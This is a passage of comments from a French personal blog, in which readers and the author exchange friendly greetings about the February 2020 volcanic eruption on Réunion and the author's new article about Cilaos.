    Pour le volcan je crois que si j'allais là bas je ne pourrais pas m'empêcher d'aller voir ça, je n'ai jamais vu un volcan en éruption.

    J'espère que tu vas bien

    Merci de ta gentille visite

    Gros bisous et douce soirée

    Gros bisous

    @lain

    66
    Mercredi 12 Février 2020 à 17:51

    Merci beaucoup pour vos commentaires...

    Douce soirée et belle nuit étoilée. (chez moi bientôt 21 H).

    Gros bisous d'amitié à vous partager.

    RV demain matin sur ce blog pour un nouvel article.

    Ci-dessous notre volcan qui a pété depuis le 10 février 2020 (1ère éruption de l'année 2020).

    Image

    67
    Mercredi 12 Février 2020 à 18:17

    Bonsoir Françoise.

    Nous avons échangé les voitures avec celle des enfants: avons rendu la leur, qu'ils croyaient en panne et repris celle de leur mère, tout de même plus agréable à conduire !

    5h de route et 1 h sur place; je n'ai pas le courage de recommencer dans 3 jours !

    Temps superbe et, vers la côte d'azur, les amandiers sont en fleurs.

    Bonne soirée.

    Gilbert

    68
    Toupinette
    Mercredi 12 Février 2020 à 20:55

    Après un petit tour sur facebook où j'ai vu que le volcan avait pété!! et que tu avais mis un nouvel article, me voilà dans ton univers et j'ai fait une belle promenade!!

    Je te fais de gros bisous!

    69
    Jeudi 13 Février 2020 à 05:13

    Merci beaucoup pour vos commentaires.

    Gros bisous d'amitié à vous partager.

    Je vous donne RV sur mon nouvel article de ce matin dont voici le lien direct :

    http://beautirocher.eklablog.com/13-2-20-cilaos-a-la-reunion-2-et-fin-chanteuse-de-l-ile-a179406758

    70
    Mardi 25 Février 2020 à 20:25

    Bonjour Françoise
    Je ne reconnais plus du tout Cilaos .

    Que de changements surtout  le " lac " qu'on appelait la mare .
    Les jacarandas sont magnifiques  à part ceux devant l'église de Cilaos il n'y en avait pas ailleurs et là au lac j'en vois plusieurs .

    Bonne soirée

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :